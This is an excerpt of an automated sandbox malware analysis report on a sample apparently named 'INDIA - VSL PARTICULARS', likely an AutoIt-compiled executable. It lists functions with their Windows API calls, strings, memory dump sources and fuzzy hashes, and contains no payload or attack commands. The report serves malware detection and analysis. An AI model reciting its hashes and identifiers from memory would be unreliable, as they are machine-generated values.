                              • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                              • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                              Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID: >>>AUTOIT SCRIPT<<<$\
                              • API String ID: 0-1896584978
                              • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                              • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                              • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                              • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                              Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsicoll$IconLoad
                              • String ID: blank$info$question$stop$warning
                              • API String ID: 2485277191-404129466
                              • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                              • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                              • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                              • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                              Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • LoadIconW.USER32(?,00000063), ref: 0045464C
                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                              • SetWindowTextW.USER32(?,?), ref: 00454678
                              • GetDlgItem.USER32(?,000003EA), ref: 00454690
                              • SetWindowTextW.USER32(00000000,?), ref: 00454697
                              • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                              • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                              • GetWindowRect.USER32(?,?), ref: 004546F5
                              • SetWindowTextW.USER32(?,?), ref: 00454765
                              • GetDesktopWindow.USER32 ref: 0045476F
                              • GetWindowRect.USER32(00000000), ref: 00454776
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                              • GetClientRect.USER32(?,?), ref: 004547D2
                              • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                              • String ID:
                              • API String ID: 3869813825-0
                              • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                              • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                              • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                              • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                              Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                              Download Yara Rule
                              APIs
                              • _wcslen.LIBCMT ref: 00464B28
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                              • _wcslen.LIBCMT ref: 00464C28
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                              • _wcslen.LIBCMT ref: 00464CBA
                              • _wcslen.LIBCMT ref: 00464CD0
                              • _wcslen.LIBCMT ref: 00464CEF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$Directory$CurrentSystem
                              • String ID: D
                              • API String ID: 1914653954-2746444292
                              • Opcode ID: 5f72559f0a2586b771b9af551f03c1fb97e064fdb306134380bfcbf6c4a29eaa
                              • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                              • Opcode Fuzzy Hash: 5f72559f0a2586b771b9af551f03c1fb97e064fdb306134380bfcbf6c4a29eaa
                              • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                              Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                              Download Yara Rule
                              APIs
                              • _wcsncpy.LIBCMT ref: 0045CE39
                              • __wsplitpath.LIBCMT ref: 0045CE78
                              • _wcscat.LIBCMT ref: 0045CE8B
                              • _wcscat.LIBCMT ref: 0045CE9E
                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                              • _wcscpy.LIBCMT ref: 0045CF61
                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                              • String ID: *.*
                              • API String ID: 1153243558-438819550
                              • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                              • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                              • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                              • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                              Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wcsicoll
                              • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                              • API String ID: 3832890014-4202584635
                              • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                              • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                              • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                              • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                              Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                              Download Yara Rule
                              APIs
                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                              • GetFocus.USER32 ref: 0046A0DD
                              • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessagePost$CtrlFocus
                              • String ID: 0
                              • API String ID: 1534620443-4108050209
                              • Opcode ID: 69f57c1da7d99aaf19a54cb3f0377e1430f34c496c45dabe130679879bb200d9
                              • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                              • Opcode Fuzzy Hash: 69f57c1da7d99aaf19a54cb3f0377e1430f34c496c45dabe130679879bb200d9
                              • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                              Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                              Download Yara Rule
                              APIs
                              • DestroyWindow.USER32(?), ref: 004558E3
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$CreateDestroy
                              • String ID: ,$tooltips_class32
                              • API String ID: 1109047481-3856767331
                              • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                              • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                              • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                              • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                              Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                              • GetMenuItemCount.USER32(?), ref: 00468C45
                              • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                              • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                              • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                              • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                              • GetMenuItemCount.USER32 ref: 00468CFD
                              • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                              • GetCursorPos.USER32(?), ref: 00468D3F
                              • SetForegroundWindow.USER32(?), ref: 00468D49
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                              • String ID: 0
                              • API String ID: 1441871840-4108050209
                              • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                              • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                              • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                              • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                              Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                              • __swprintf.LIBCMT ref: 00460915
                              • __swprintf.LIBCMT ref: 0046092D
                              • _wprintf.LIBCMT ref: 004609E1
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                              • API String ID: 3631882475-2268648507
                              • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                              • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                              • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                              • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                              Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                              Download Yara Rule
                              APIs
                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                              • SendMessageW.USER32 ref: 00471740
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                              • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                              • SendMessageW.USER32 ref: 0047184F
                              • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                              • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                              • String ID:
                              • API String ID: 4116747274-0
                              • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                              • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                              • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                              • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                              Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                              • _wcslen.LIBCMT ref: 00461683
                              • __swprintf.LIBCMT ref: 00461721
                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                              • GetDlgCtrlID.USER32(?), ref: 00461869
                              • GetWindowRect.USER32(?,?), ref: 004618A4
                              • GetParent.USER32(?), ref: 004618C3
                              • ScreenToClient.USER32(00000000), ref: 004618CA
                              • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                              • String ID: %s%u
                              • API String ID: 1899580136-679674701
                              • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                              • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                              • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                              • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                              Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                              Download Yara Rule
                              APIs
                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                              • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
